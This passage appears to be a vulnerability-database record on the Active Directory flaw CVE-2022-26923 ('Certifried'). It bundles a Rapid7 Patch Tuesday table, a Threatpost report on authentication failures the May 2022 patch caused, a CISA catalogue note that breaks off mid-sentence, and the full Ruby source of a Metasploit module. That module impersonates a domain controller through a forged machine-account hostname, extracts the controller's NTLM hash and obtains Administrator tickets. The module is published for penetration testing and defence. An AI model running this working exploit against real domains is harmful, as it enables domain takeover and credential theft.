\n[CVE-2022-29135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29135>) | Windows Cluster Shared Volume (CSV) Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-29150](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29150>) | Windows Cluster Shared Volume (CSV) Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-29151](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29151>) | Windows Cluster Shared Volume (CSV) Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26913](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26913>) | Windows Authentication Security Feature Bypass Vulnerability | No | No | 7.4 | Yes \n[CVE-2022-23279](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23279>) | Windows ALPC Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-29126](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29126>) | Tablet Windows User Interface Application Core Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26932](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26932>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 8.2 | Yes \n[CVE-2022-26938](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26938>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26939](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26939>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26940](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26940>) | Remote Desktop Protocol Client Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-22017](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22017>) | Remote Desktop Client Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-26923](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26923>) | Active Directory Domain Services Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n \n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T19:59:20", "type": "rapid7blog", "title": "Patch Tuesday - May 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-21978", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22017", "CVE-2022-22019", "CVE-2022-22713", "CVE-2022-23267", "CVE-2022-23270", "CVE-2022-23279", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26932", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-26938", "CVE-2022-26939", "CVE-2022-26940", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29106", "CVE-2022-29107", "CVE-2022-29108", "CVE-2022-29109", "CVE-2022-29110", "CVE-2022-29112", "CVE-2022-29113", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29116", "CVE-2022-29117", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29133", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-29142", "CVE-2022-29145", "CVE-2022-29148", "CVE-2022-29150", "CVE-2022-29151", "CVE-2022-29972", "CVE-2022-30129", "CVE-2022-30130"], "modified": "2022-05-10T19:59:20", "id": "RAPID7BLOG:82692E307F294B32BDCAC4053EBE23B2", "href": "https://blog.rapid7.com/2022/05/10/patch-tuesday-may-2022/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-01-28T11:32:32", "description": "This module exploits a privilege escalation vulnerability in Active Directory Certificate Services (ADCS) to generate a valid certificate impersonating the Domain Controller (DC) computer account. This certificate is then used to authenticate to the target as the DC account using PKINIT preauthentication mechanism. The module will get and cache the Ticket-Granting-Ticket (TGT) for this account along with its NTLM hash. Finally, it requests a TGS impersonating a privileged user (Administrator by default). This TGS can then be used by other modules or external tools.\n", "cvss3": {}, "published": "2023-01-13T14:30:50", "type": "metasploit", "title": "Active Directory Certificate Services (ADCS) privilege escalation (Certifried)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-26923"], "modified": "2023-01-26T16:17:50", "id": "MSF:AUXILIARY-ADMIN-DCERPC-CVE_2022_26923_CERTIFRIED-", "href": "https://www.rapid7.com/db/modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SMB::Client::Authenticated\n alias connect_smb_client connect\n\n include Msf::Exploit::Remote::Kerberos::Client\n\n include Msf::Exploit::Remote::LDAP\n include Msf::Auxiliary::Report\n include Msf::Exploit::Remote::MsIcpr\n include Msf::Exploit::Remote::MsSamr\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Active Directory Certificate Services (ADCS) privilege escalation (Certifried)',\n 'Description' => %q{\n This module exploits a privilege escalation vulnerability in Active\n Directory Certificate Services (ADCS) to generate a valid certificate\n impersonating the Domain Controller (DC) computer account. This\n certificate is then used to authenticate to the target as the DC\n account using PKINIT preauthentication mechanism. The module will get\n and cache the Ticket-Granting-Ticket (TGT) for this account along\n with its NTLM hash. Finally, it requests a TGS impersonating a\n privileged user (Administrator by default). This TGS can then be used\n by other modules or external tools.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Oliver Lyak', # Discovery\n 'CravateRouge', # bloodyAD implementation\n 'Erik Wynter', # MSF module\n 'Christophe De La Fuente' # MSF module\n ],\n 'References' => [\n ['URL', 'https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4'],\n ['URL', 'https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html'],\n ['CVE', '2022-26923']\n ],\n 'Notes' => {\n 'AKA' => [ 'Certifried' ],\n 'Reliability' => [CRASH_SAFE],\n 'Stability' => [],\n 'SideEffects' => [ IOC_IN_LOGS ]\n },\n 'Actions' => [\n [ 'REQUEST_CERT', { 'Description' => 'Request a certificate with DNS host name matching the DC' } ],\n [ 'AUTHENTICATE', { 'Description' => 'Same as REQUEST_CERT but also authenticate' } ],\n [ 'PRIVESC', { 'Description' => 'Full privilege escalation attack' } ]\n ],\n 'DefaultAction' => 'PRIVESC',\n 'DefaultOptions' => {\n 'RPORT' => 445,\n 'SSL' => true,\n 'DOMAIN' => ''\n }\n )\n )\n\n register_options([\n # Using USERNAME, PASSWORD and DOMAIN options defined by the LDAP mixin\n OptString.new('DC_NAME', [ true, 'Name of the domain controller being targeted (must match RHOST)' ]),\n OptInt.new('LDAP_PORT', [true, 'LDAP port (default is 389 and default encrypted is 636)', 636]), # Set to 636 for legacy SSL\n OptString.new('DOMAIN', [true, 'The Fully Qualified Domain Name (FQDN). Ex: mydomain.local']),\n OptString.new('USERNAME', [true, 'The username to authenticate with']),\n OptString.new('PASSWORD', [true, 'The password to authenticate with']),\n OptString.new(\n 'SPN', [\n false,\n 'The Service Principal Name used to request an additional impersonated TGS, format is \"service_name/FQDN\" '\\\n '(e.g. \"ldap/dc01.mydomain.local\"). Note that, independently of this option, a TGS for \"cifs/<DC_NAME>.<DOMAIN>\"'\\\n ' will always be requested.',\n ],\n conditions: %w[ACTION == PRIVESC]\n ),\n OptString.new(\n 'IMPERSONATE', [\n true,\n 'The user on whose behalf a TGS is requested (it will use S4U2Self/S4U2Proxy to request the ticket)',\n 'Administrator'\n ],\n conditions: %w[ACTION == PRIVESC]\n )\n ])\n\n deregister_options('CERT_TEMPLATE', 'ALT_DNS', 'ALT_UPN', 'PFX', 'ON_BEHALF_OF', 'SMBUser', 'SMBPass', 'SMBDomain')\n end\n\n def run\n @privesc_success = false\n @computer_created = false\n\n opts = {}\n validate_options\n unless can_add_computer?\n fail_with(Failure::NoAccess, 'Machine account quota is zero, this user cannot create a computer account')\n end\n\n opts[:tree] = connect_smb\n computer_info = add_computer(opts)\n @computer_created = true\n disconnect_smb(opts.delete(:tree))\n\n impersonate_dc(computer_info.name)\n\n opts = {\n username: computer_info.name,\n password: computer_info.password\n }\n opts[:tree] = connect_smb(opts)\n opts[:cert_template] = 'Machine'\n cert = request_certificate(opts)\n fail_with(Failure::UnexpectedReply, 'Unable to request the certificate.') unless cert\n\n if ['AUTHENTICATE', 'PRIVESC'].include?(action.name)\n credential, key = get_tgt(cert)\n fail_with(Failure::UnexpectedReply, 'Unable to request the TGT.') unless credential && key\n\n get_ntlm_hash(credential, key)\n end\n\n if action.name == 'PRIVESC'\n # Always request a TGS for `cifs/...` SPN, since we need it to properly delete the computer account\n default_spn = \"cifs/#{datastore['DC_NAME']}.#{datastore['DOMAIN']}\"\n request_ticket(credential, default_spn)\n @privesc_success = true\n\n # If requested, get an additional TGS\n if datastore['SPN'].present? && datastore['SPN'].casecmp(default_spn) != 0\n begin\n request_ticket(credential, datastore['SPN'])\n rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e\n print_error(\"Unable to get the additional TGS for #{datastore['SPN']}: #{e.message}\")\n end\n end\n end\n rescue MsSamrConnectionError, MsIcprConnectionError => e\n fail_with(Failure::Unreachable, e.message)\n rescue MsSamrAuthenticationError, MsIcprAuthenticationError => e\n fail_with(Failure::NoAccess, e.message)\n rescue MsSamrNotFoundError, MsIcprNotFoundError => e\n fail_with(Failure::NotFound, e.message)\n rescue MsSamrBadConfigError => e\n fail_with(Failure::BadConfig, e.message)\n rescue MsSamrUnexpectedReplyError, MsIcprUnexpectedReplyError => e\n fail_with(Failure::UnexpectedReply, e.message)\n rescue MsSamrUnknownError, MsIcprUnknownError => e\n fail_with(Failure::Unknown, e.message)\n rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e\n fail_with(Failure::Unknown, e.message)\n ensure\n if @computer_created\n print_status(\"Deleting the computer account #{computer_info&.name}\")\n disconnect_smb(opts.delete(:tree)) if opts[:tree]\n if @privesc_success\n # If the privilege escalation succeeded, let'use the cached TGS\n # impersonating the admin to delete the computer account\n datastore['SMB::Auth'] = Msf::Exploit::Remote::AuthOption::KERBEROS\n datastore['Smb::Rhostname'] = \"#{datastore['DC_NAME']}.#{datastore['DOMAIN']}\"\n datastore['SMBDomain'] = datastore['DOMAIN']\n datastore['DomainControllerRhost'] = rhost\n tree = connect_smb(username: datastore['IMPERSONATE'])\n else\n tree = connect_smb\n end\n opts = {\n tree: tree,\n computer_name: computer_info&.name\n }\n begin\n delete_computer(opts) if opts[:tree] && opts[:computer_name]\n rescue MsSamrUnknownError => e\n print_warning(\"Unable to delete the computer account, this will have to be done manually with an Administrator account (#{e.message})\")\n end\n disconnect_smb(opts.delete(:tree)) if opts[:tree]\n end\n end\n\n def validate_options\n if datastore['USERNAME'].blank?\n fail_with(Failure::BadConfig, 'USERNAME not set')\n end\n if datastore['PASSWORD'].blank?\n fail_with(Failure::BadConfig, 'PASSWORD not set')\n end\n if datastore['DOMAIN'].blank?\n fail_with(Failure::BadConfig, 'DOMAIN not set')\n end\n unless datastore['DOMAIN'].match(/.+\\..+/)\n fail_with(Failure::BadConfig, 'DOMAIN format must be FQDN (ex: mydomain.local)')\n end\n if datastore['CA'].blank?\n fail_with(Failure::BadConfig, 'CA not set')\n end\n if datastore['DC_NAME'].blank?\n fail_with(Failure::BadConfig, 'DC_NAME not set')\n end\n if datastore['SPN'].present? && !datastore['SPN'].match(%r{.+/.+\\..+\\..+})\n fail_with(Failure::BadConfig, 'SPN format must be <service_name>/<hostname>.<FQDN> (ex: cifs/dc01.mydomain.local)')\n end\n end\n\n def connect_smb(opts = {})\n username = opts[:username] || datastore['USERNAME']\n password = opts[:password] || datastore['PASSWORD']\n domain = opts[:domain] || datastore['DOMAIN']\n datastore['SMBUser'] = username\n datastore['SMBPass'] = password\n datastore['SMBDomain'] = domain\n\n if datastore['SMB::Auth'] == Msf::Exploit::Remote::AuthOption::KERBEROS\n vprint_status(\"Connecting SMB with #{username}.#{domain} using Kerberos authentication\")\n else\n vprint_status(\"Connecting SMB with #{username}.#{domain}:#{password}\")\n end\n begin\n connect_smb_client\n rescue Rex::ConnectionError, RubySMB::Error::RubySMBError => e\n fail_with(Failure::Unreachable, e.message)\n end\n\n begin\n smb_login\n rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError => e\n fail_with(Failure::NoAccess, \"Unable to authenticate ([#{e.class}] #{e})\")\n end\n report_service(\n host: rhost,\n port: rport,\n host_name: simple.client.default_name,\n proto: 'tcp',\n name: 'smb',\n info: \"Module: #{fullname}, last negotiated version: SMBv#{simple.client.negotiated_smb_version} (dialect = #{simple.client.dialect})\"\n )\n\n begin\n simple.client.tree_connect(\"\\\\\\\\#{sock.peerhost}\\\\IPC$\")\n rescue RubySMB::Error::RubySMBError => e\n fail_with(Failure::Unreachable, \"Unable to connect to the remote IPC$ share ([#{e.class}] #{e})\")\n end\n end\n\n def disconnect_smb(tree)\n vprint_status('Disconnecting SMB')\n tree.disconnect! if tree\n simple.client.disconnect!\n rescue RubySMB::Error::RubySMBError => e\n print_warning(\"Unable to disconnect SMB ([#{e.class}] #{e})\")\n end\n\n def can_add_computer?\n vprint_status('Requesting the ms-DS-MachineAccountQuota value to see if we can add any computer accounts...')\n\n quota = nil\n begin\n ldap_open do |ldap|\n ldap_options = {\n filter: Net::LDAP::Filter.eq('objectclass', 'domainDNS'),\n attributes: 'ms-DS-MachineAccountQuota',\n return_result: false\n }\n ldap.search(ldap_options) do |entry|\n quota = entry['ms-ds-machineaccountquota']&.first&.to_i\n end\n end\n rescue Net::LDAP::Error => e\n print_error(\"LDAP error: #{e.class}: #{e.message}\")\n end\n\n if quota.blank?\n print_warning('Received no result when trying to obtain ms-DS-MachineAccountQuota. Adding a computer account may not work.')\n return true\n end\n\n vprint_status(\"ms-DS-MachineAccountQuota = #{quota}\")\n quota > 0\n end\n\n def print_ldap_error(ldap)\n opres = ldap.get_operation_result\n msg = \"LDAP error #{opres.code}: #{opres.message}\"\n unless opres.error_message.to_s.empty?\n msg += \" - #{opres.error_message}\"\n end\n print_error(\"#{peer} #{msg}\")\n end\n\n def ldap_open\n ldap_peer = \"#{rhost}:#{datastore['LDAP_PORT']}\"\n base = datastore['DOMAIN'].split('.').map { |dc| \"dc=#{dc}\" }.join(',')\n ldap_options = {\n port: datastore['LDAP_PORT'],\n base: base\n }\n\n ldap_connect(ldap_options) do |ldap|\n if ldap.get_operation_result.code != 0\n print_ldap_error(ldap)\n break\n end\n print_good(\"Successfully authenticated to LDAP (#{ldap_peer})\")\n yield ldap\n end\n end\n\n def get_dnshostname(ldap, c_name)\n dnshostname = nil\n filter1 = Net::LDAP::Filter.eq('Name', c_name.delete_suffix('$'))\n filter2 = Net::LDAP::Filter.eq('objectclass', 'computer')\n joined_filter = Net::LDAP::Filter.join(filter1, filter2)\n ldap_options = {\n filter: joined_filter,\n attributes: 'DNSHostname',\n return_result: false\n\n }\n ldap.search(ldap_options) do |entry|\n dnshostname = entry[:dnshostname]&.first\n end\n vprint_status(\"Retrieved original DNSHostame #{dnshostname} for #{c_name}\") if dnshostname\n dnshostname\n end\n\n def impersonate_dc(computer_name)\n ldap_open do |ldap|\n dc_dnshostname = get_dnshostname(ldap, datastore['DC_NAME'])\n print_status(\"Attempting to set the DNS hostname for the computer #{computer_name} to the DNS hostname for the DC: #{datastore['DC_NAME']}\")\n domain_to_ldif = datastore['DOMAIN'].split('.').map { |dc| \"dc=#{dc}\" }.join(',')\n computer_dn = \"cn=#{computer_name.delete_suffix('$')},cn=computers,#{domain_to_ldif}\"\n ldap.modify(dn: computer_dn, operations: [[ :add, :dnsHostName, dc_dnshostname ]])\n new_computer_hostname = get_dnshostname(ldap, computer_name)\n if new_computer_hostname != dc_dnshostname\n fail_with(Failure::Unknown, 'Failed to change the DNS hostname')\n end\n print_good('Successfully changed the DNS hostname')\n end\n rescue Net::LDAP::Error => e\n print_error(\"LDAP error: #{e.class}: #{e.message}\")\n end\n\n def get_tgt(cert)\n dc_name = datastore['DC_NAME'].dup.downcase\n dc_name += '$' unless dc_name.ends_with?('$')\n username, realm = extract_user_and_realm(cert.certificate, dc_name, datastore['DOMAIN'])\n print_status(\"Attempting PKINIT login for #{username}@#{realm}\")\n begin\n server_name = \"krbtgt/#{realm}\"\n tgt_result = send_request_tgt_pkinit(\n pfx: cert,\n client_name: username,\n realm: realm,\n server_name: server_name,\n rport: 88\n )\n print_good('Successfully authenticated with certificate')\n\n report_service(\n host: rhost,\n port: rport,\n name: 'Kerberos-PKINIT',\n proto: 'tcp',\n info: \"Module: #{fullname}, Realm: #{realm}\"\n )\n\n ccache = Rex::Proto::Kerberos::CredentialCache::Krb5Ccache.from_responses(tgt_result.as_rep, tgt_result.decrypted_part)\n Msf::Exploit::Remote::Kerberos::Ticket::Storage.store_ccache(ccache, host: rhost, framework_module: self)\n\n [ccache.credentials.first, tgt_result.krb_enc_key[:key]]\n rescue Rex::Proto::Kerberos::Model::Error::KerberosError => e\n case e.error_code\n when Rex::Proto::Kerberos::Model::Error::ErrorCodes::KDC_ERR_CERTIFICATE_MISMATCH\n print_error(\"Failed: #{e.message}, Target system is likely not vulnerable to Certifried\")\n else\n print_error(\"Failed: #{e.message}\")\n end\n nil\n end\n end\n\n def get_ntlm_hash(credential, key)\n dc_name = datastore['DC_NAME'].dup.downcase\n dc_name += '$' unless dc_name.ends_with?('$')\n print_status(\"Trying to retrieve NT hash for #{dc_name}\")\n\n realm = datastore['DOMAIN'].downcase\n\n authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base.new(\n host: rhost,\n realm: realm,\n username: dc_name,\n framework: framework,\n framework_module: self\n )\n tgs_ticket, _tgs_auth = authenticator.u2uself(credential)\n\n session_key = Rex::Proto::Kerberos::Model::EncryptionKey.new(\n type: credential.keyblock.enctype.value,\n value: credential.keyblock.data.value\n )\n ticket_enc_part = Rex::Proto::Kerberos::Model::TicketEncPart.decode(\n tgs_ticket.enc_part.decrypt_asn1(session_key.value, Rex::Proto::Kerberos::Crypto::KeyUsage::KDC_REP_TICKET)\n )\n value = OpenSSL::ASN1.decode(ticket_enc_part.authorization_data.elements[0][:data]).value[0].value[1].value[0].value\n pac = Rex::Proto::Kerberos::Pac::Krb5Pac.read(value)\n pac_info_buffer = pac.pac_info_buffers.find do |buffer|\n buffer.ul_type == Rex::Proto::Kerberos::Pac::Krb5PacElementType::CREDENTIAL_INFORMATION\n end\n unless pac_info_buffer\n print_error('NTLM hash not found in PAC')\n return\n end\n\n serialized_pac_credential_data = pac_info_buffer.buffer.pac_element.decrypt_serialized_data(key)\n ntlm_hash = serialized_pac_credential_data.data.extract_ntlm_hash\n print_good(\"Found NTLM hash for #{dc_name}: #{ntlm_hash}\")\n report_ntlm(realm, dc_name, ntlm_hash)\n end\n\n def report_ntlm(domain, user, hash)\n jtr_format = Metasploit::Framework::Hashes.identify_hash(hash)\n service_data = {\n address: rhost,\n port: rport,\n service_name: 'smb',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n credential_data = {\n module_fullname: fullname,\n origin_type: :service,\n private_data: hash,\n private_type: :ntlm_hash,\n jtr_format: jtr_format,\n username: user,\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\n realm_value: domain\n }.merge(service_data)\n\n credential_core = create_credential(credential_data)\n\n login_data = {\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def request_ticket(credential, spn)\n print_status(\"Getting TGS impersonating #{datastore['IMPERSONATE']}@#{datastore['DOMAIN']} (SPN: #{spn})\")\n\n dc_name = datastore['DC_NAME'].dup.downcase\n dc_name += '$' if !dc_name.ends_with?('$')\n\n options = {\n host: rhost,\n realm: datastore['DOMAIN'],\n username: dc_name,\n framework: framework,\n framework_module: self\n }\n\n authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base.new(**options)\n\n sname = Rex::Proto::Kerberos::Model::PrincipalName.new(\n name_type: Rex::Proto::Kerberos::Model::NameType::NT_SRV_INST,\n name_string: spn.split('/')\n )\n auth_options = {\n sname: sname,\n impersonate: datastore['IMPERSONATE']\n }\n authenticator.s4u2self(credential, auth_options)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2022-05-19T00:06:33", "description": "Microsoft is alerting customers that its May Patch [Tuesday update](<https://docs.microsoft.com/en-us/windows/release-health/status-windows-11-21h2#2826msgdesc>) is causing authentications errors and failures tied to Windows Active Directory Domain Services. In a Friday update, Microsoft said it was investigating the issue.\n\nThe warning comes amid [shared reports](<https://www.reddit.com/r/sysadmin/comments/um9qur/patch_tuesday_megathread_20220510/i85p2ll/?context=3>) of multiple services and policies failing after installing the security update. \u201cAuthentication failed due to a user credentials mismatch. Either the user name provided does not map to an existing account or the password was incorrect.\u201d posted an admin to a Reddit thread on the topic.\n\nAccording to Microsoft, the issue has been caused after installing the updates released on May 10, 2022.\n\n\u201cAfter installing updates released May 10, 2022 on your domain controllers, you might see authentication failures on the server or client for services such as [Network Policy Server (NPS)](<https://docs.microsoft.com/en-us/windows-server/networking/technologies/nps/nps-top>), [Routing and Remote access Service (RRAS)](<https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn614140\\(v=ws.11\\)>), [Radius](<https://docs.microsoft.com/en-us/windows/win32/nps/ias-radius-authentication-and-accounting>), [Extensible Authentication Protocol (EAP)](<https://docs.microsoft.com/en-us/windows-server/networking/technologies/extensible-authentication-protocol/network-access>), and [Protected Extensible Authentication Protocol (PEAP)](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-peap/a128a089-0919-41a5-a0c2-9f25ef28289d>),\u201d Microsoft reported.\n\n\u201cAn issue has been found related to how the mapping of certificates to machine accounts is being handled by the domain controller,\u201d Microsoft added.\n\nThe domain controller is a server that is responsible for responding to authentication requests as well as verifying the user on a computer network, and the active directory is a type of directory service that stores the information about objects on a network and makes this information readily available for the users.\n\nMicrosoft added a note that the update will not affect the client\u2019s Windows devices and non-domain controller windows servers, and will only cause issues for the server acting as a domain controller.\n\n\u201cInstallation of updates released May 10, 2022, on client Windows devices and non-domain controller Windows Servers will not cause this issue. This issue only affects installation of May 10, 2022, updates installed on servers used as domain controllers.\u201d Microsoft explains.\n\n## **Authentication Failure Caused by Security Update**\n\n[Microsoft releases another document](<https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16#bkmk_compatmode>), explaining further details related to the authentication problem caused by the security update addressing the privilege escalation vulnerabilities in Windows Kerbose and its Active Directory Domain Service.\n\nThe vulnerabilities are tracked as [CVE-2022-26931](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-26931>) in Windows Kerberos with a high severity CVSS rating of 7.5 and [CVE-2022-26923](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26923>) (discovered by security researcher [Oliver Lyak](<https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4>)) in Microsoft\u2019s Active Directory Domain Services. It has a CVSS score of 8.8 and is rated as high. An attacker can exploit the vulnerability if left unpatched and escalate the privilege to that of the [domain admin](<https://twitter.com/wdormann/status/1524446644942647299>).\n\n## **Workarounds**\n\nThe Domain administrators are advised by Microsoft to [manually map](<https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16#bkmk_certmap>) the certificates to a user in Active Directory until the official updates are available.\n\n\u201cDomain administrators can manually map certificates to a user in Active Directory using the altSecurityIdentities attribute of the user\u2019s Object,\u201d Microsoft added.\n\n\u201cIf the preferred mitigation will not work in your environment, please see [\u2018KB5014754](<https://support.microsoft.com/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16>)\u2014Certificate-based authentication changes on Windows domain controllers\u2019 for other possible mitigations in the SChannel registry key section,\u201d reported by Microsoft.\n\nAs per Microsoft any other mitigation method might not provide adequate security hardening.\n\nAccording to Microsoft, the May 2022 update is allowing all authentication attempts unless the certificate is older than the user, this is because the updates automatically set the StrongCertificateBindingEnforcement registry key, \u201cwhich changes the enforcement mode of the KDC to Disabled Mode, Compatibility Mode, or Full Enforcement Mode\u201d Microsoft explains.\n\nOne Window Admin that spoke to _Bleepingcomputer _said that the only way they were able to get some of the users log in with the following installation of the patch was to disable the StrongCertificateBindingEnforcement key by settings its value to 0.\n\nBy changing the REG_DWORD DataType value to 0, the admin can disable the strong certificate mapping check and can create the key from the scratch. This method is not recommended by Microsoft, but it\u2019s the only way to allow all users to log in.\n\nThe issues are properly investigated by Microsoft and a proper fix should be available soon.\n\nMicrosoft also recently releases the [73 new patches](<https://threatpost.com/microsoft-zero-day-mays-patch-tuesday/179579/>) of May\u2019s monthly update of security fixes.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-16T11:46:39", "type": "threatpost", "title": "Microsoft\u2019s May Patch Tuesday Updates Cause Windows AD Authentication Errors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923", "CVE-2022-26931"], "modified": "2022-05-16T11:46:39", "id": "THREATPOST:FFC96438DF87C2B7A1ABFD101EBC298C", "href": "https://threatpost.com/microsofts-may-patch-tuesday-updates-cause-windows-ad-authentication-errors/179631/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2022-07-02T13:56:44", "description": "CISA has added one new vulnerability to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. **Note:** to view the newly added vulnerabilities in the catalog, click on the arrow in the \"Date Added to Catalog\" column, which will sort by descending dates.\n\n**Note:** CISA previously added and then removed today\u2019s addition, CVE-2022-26925, to the KEV Catalog after determining that remediations associated with this vulnerability would break certificate authentication for many federal agencies. Details:\n\n * CVE-2022-26925 was mitigated by Microsoft\u2019s June 2022 Patch Tuesday update. \n * The Microsoft update also includes remediations for CVE-2022-26923 and CVE-2022-26931, which change the way certificates are mapped to accounts in Active Directory. These changes break certificate authentication for many federal agencies.\n * For this reason, CISA has also published a [Knowledge Article](<https://www.cisa.gov/guidance-applying-june-microsoft-patch>) that provides critical steps that must be followed to prevent service outages. Agencies should review this** **[Knowledge Article](<https://www.cisa.gov/guidance-applying-june-microsoft-patch>)** **carefully before beginning the mitigation 